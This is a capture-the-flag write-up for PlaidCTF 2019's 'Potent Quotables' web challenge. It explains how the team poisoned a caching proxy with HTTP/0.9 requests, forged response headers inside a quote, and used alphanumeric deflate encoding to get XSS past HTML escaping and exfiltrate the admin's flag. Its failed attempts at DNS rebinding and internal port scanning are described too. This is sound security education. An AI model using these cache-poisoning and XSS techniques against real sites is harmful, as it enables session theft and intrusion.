PlaidCTF 2019: Potent Quotables (Web 300)

pspaul

2019-04-16

Challenge Author: Plaid Parliament of Pwning
Category: Web
Points: 300
Solves: 10

Description

I set up a little quotes server so that we can all share our favorite quotes with each other. I wrote it in Flask, but I decided that since it’s mostly static content anyway, I should probably put some kind of caching layer in front of it, so I wrote a caching reverse proxy. It all seems to be working well, though I do get this weird error when starting up the server:

* Environment: production

    WARNING: Do not use the development server in a production environment.

    Use a production WSGI server instead.

I’m sure that’s not important.

Oh, and don’t bother trying to go to the /admin page, that’s not for you.

Hint: Extra server
Alternate server for PQ: http://quotables2.pwni.ng:1337/ (same configuration in all respects)

Writeup

For TL;DR see below.

What We Got

The web app was a collection of quotes. There was a start page which showed featured quotes. Anyone could create a new quote, there was no login system. Quotes consisted of the actual quote and an attribution. Everyone can vote +1 or -1 on a quote. Quotes can also be reported to an admin.

Glancing under the hood, we found one big JS file that holds all the client logic. It acted differently based on the current path. On the featured page it loaded the featured quotes from /api/featured. When looking at a single quote, it took the quote’s ID from the URL fragment part, loaded the quote data from /api/quote/${id} and the quote’s voting score from /api/score/${id}. There was also a status page for each report, which had basically the same logic as the quote page, but got the data from /api/report/${id}. Most of the API calls were POST requests, even if they only get data and didn’t send anything.

When submitting a quote for report, the status page told about whether or not the quote had been visited yet. Most of the time it was visited about instantly. The POST request that initiated a report contained the whole URL, not just the quote’s ID. So we tried to insert an arbitrary URL, which lead to a visit of a friendly HeadlessChrome/75.0.3738.0.

The description also mentions /admin, which gives us a page with two links, Visit next report and Flag. Both give us Access denied.

The binary is what the description says: An HTTP reverse proxy with caching functionality. We will take a closer look into it later.

First educated guesses

Since there is a report mechanism, it is likely that we have to exploit a client-side web vuln, such as XSS.

The hint in the description about the environment only told us that this should be a Flask/Werkzeug server on the backend but since it did not say Environment: development, we were not sure if there was something else that it should have told us.

Since I am more of a web guy than reversing or pwning, I did not look at the binary at first. Since the web app had a relatively secure Content Security Policy header in place (only none, self or nonced sources), I thought that the way to go might be to use a bug in there to bypass the CSP. So I started to look for XSS, because I only have to do the reversing when I already have found something.

Looking for that XSS 👀

The JavaScript that handles the loading of the quote data puts the response data into an elements innerHTML, which looks very suspicious, expecially because in other cases it uses innerText 🤔🤔🤔. The code looks like this:

result = api(`/api/quote/${uid}`)
    .then((data) => {
        let quote = data;
        let attribution = undefined;
        let index = data.indexOf("\n-");

        if (index >= 0) {
            quote = data.substring(0, index);
            attribution = data.substring(index+2);
        }

        document.querySelectorAll(`input[data-init='report-path']`).forEach((elt) => {
            elt.value = window.location.href;
        });

        document.querySelectorAll(`[data-init='quote']`).forEach((elt) => {
            elt.innerHTML = quote;
        });

        document.querySelectorAll(`[data-init='attribution']`).forEach((elt) => {
            elt.innerHTML = attribution || "(Unattributed)";
        });
    })
    .then(() => api(`/api/score/${uid}`))
    .then((data) => {
        document.querySelectorAll(`[data-init='score']`).forEach((elt) => {
            elt.innerText = data;
        });
    })
    .then(() => {
        document.querySelectorAll(".voting").forEach((elt) => {
            elt.dataset.uid = uid;
        });

        setupVoteButtons();
    });

When trying to create a quote with HTML tags, they were properly escaped by the backend. When tried hard to confuse it and cause an escaping error, but it looked safe. We then thought about the data.indexOf()/data.substring() part in the JS. Maybe we could use multi byte characters to confuse subtring() to split one of those into < or >? Turns out we couldn’t.

The voting also looked safe, because we could only send the values +1 or -1, otherwise the server returned Not ok. So how tf do we XSS this?

The binary

Meanwhile, a few team mates had already looked into the binary, so I joined them to maybe find something interesting.

It was an 64-bit ELF executable that takes a port as the first argument and listens there. On connection it starts a thread that handles the connection. The thread detaches itself and starts to read an HTTP request. It does so by first reading the status line and parsing it. It then reads the headers line by line and saves them, but throws away old headers with the same header name. It then sets some default headers to prepare the request to be sent to the actual backend:

Host: the value of the PROXY_HOST env variable
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3
Connection: close
Proxy-Connection: close

After that, it checks if there is a cached reponse available for the request. The path of the request is used as the key. If it is a GET request and it has something matching in cache, the response is returned immediately and we are done. If it cannot find anything, it opens a connection to the backend, which is hardcoded as app:5000. It then gets the request’s Content-Length header, parses the value, allocates memory for it and reads the request body. After that, it send the whole request to the backend and reads the response. If the response is less than 0x20000 bytes, the request was a GET request and the first response line is HTTP/1.0 200 OK, it inserts the response into the cache.

After searching for some strings, the binary seems to be the solution for a CMU lab task! So PPP is as lazy as all of us 🤣.

Our Pwning guys also took a quick look at it and declared it as safe (at least for a 300 points challenge).

But what now?

We thought about ways to maybe exploit the simple parsing of the proxy. Maybe Request Smuggling? Didn’t work. Looking at the binary did not really lead to new findings, it mostly confirmed our assumptions about it. So back to the web app.

We noticed that the quotes are the only place where HTML was being escaped and the reports where the only place where we could input arbitrary stuff and it was not HTML-escaped. But the Content-Type was application/json and also there was no X-Content-Type-Options: nosniff it did not seem to be exploitable in Chrome.

Someone noticed that one of the featured quotes said something about regular expression, so maybe the HTML escaping was implemented that way, but it looked safe.

We also tried different charsets like UTF-16, but that didn’t worker either, which is not surprising since we had no control about the response charset.

How to admin

We did not really now how the admin bot authenticated itself. Cookie? Coming from an internal IP? Anything else? We tried to do some DNS rebinding since we had no other ideas. We thought that such a solution would be unintended, since the whole application logic and the binary would have been useless then. But hey, flag is flag 🤷‍♂.

We used rbndr.us to quickly set up something that would resolve to the public IP of the app or to our own server that served a script that fetched the flag or exfiltrated the cookies. There was a high level of confusion (at least for me), because the results were very different on different environments. I had my developer tools open which disabled any caching for me so the rebinding worked very well. When I sent the link as a report, it did not work at all. After I noticed the caching, I enabled the caches for me, tried some other things until it worked again for me. Still no luck with the admin bot. A team mate (kunte_) then got it working one time, which might have been a random bit flip or something, I honestly don’t know.

I then decided to check the local IP of the bot using WebRTC, which lead to different IPs for each try, all in the 172.18.0.0/24 subnet. So most likely each time someone reports a URL, the backend spawns a HeadlessChrome docker container that visits it. So maybe we have to use the interal IP of the backend? I wrote a small port scanner in JavaScript and used it to scan that subnet and also its neighbours, but there wasn’t anything on port 5000.

After that I looked at the DNS rebinding again. I looked into how Chrome’s DNS cache works, which seemed to hold 100 or 1000 hosts (depending on the configuration). I played around with it a little to build a reliable cache eviction script. I used different approaches like adding many dns-prefetch link elements to the header, all with different hosts, which would cause the browser to resolve all of them. I also tried loading scripts, images and styles, or call fetch() on them. Nothing worked really reliably (at least not on the HeadlessChrome), so I abandoned the idea and went to sleep.

The breakthrough

It was a new day, but there were no new ideas, so we looked at the web app again. Maybe a bug in Flask/Werkzeug? Why does the proxy set the User-Agent header explicitly? Is there some special handling of some User-Agents?

I did not find anything related to the User-Agent, but the general HTTP parsing had a weird part: HTTP/0.9 support! When the HTTP version of the request is 0.9, the server does not respond with any headers, it directly sends the body. Coincidentally, a team mate (@LinusHenze) found this 1 or 2 minutes before me, just by trying out different HTTP versions.

We could abuse this by creating a quote that had HTTP/1.0 200 OK as the first line. We then had to send a GET /api/quotes/${id} HTTP/0.9 request through the cache so the response would be cached for that path!

Now we had a method to control the headers and the body of a HTTP response! But we still couldn’t insert HTML, because the server still escapes the precious <>&"'.

Ladies and gentlemen, we got him!

We tried different encodings such as UTF-7, UTF-16, or deflate but had no luck for various reasons. UTF-7 is not supported anymore and other encodings introduced bad characters. But then a team mate (@lukas2511) found “A deflate compressor that emits compressed data that is in the [A-Za-z0-9] ASCII byte range”. After he got it working, he could create a quote that looked like this:

HTTP/1.0 200 OK
Content-Length: x
Content-Encoding: deflate
Content-Type: text/html; charset=utf-8

...(alphanumeric deflate compressed body that fetches and exfiltrates the flag)...

When he sent it to the admin bot, we got the flag!

TL;DR

HTTP/0.9 + Cache + Alphanumeric Deflate = XSS 🎉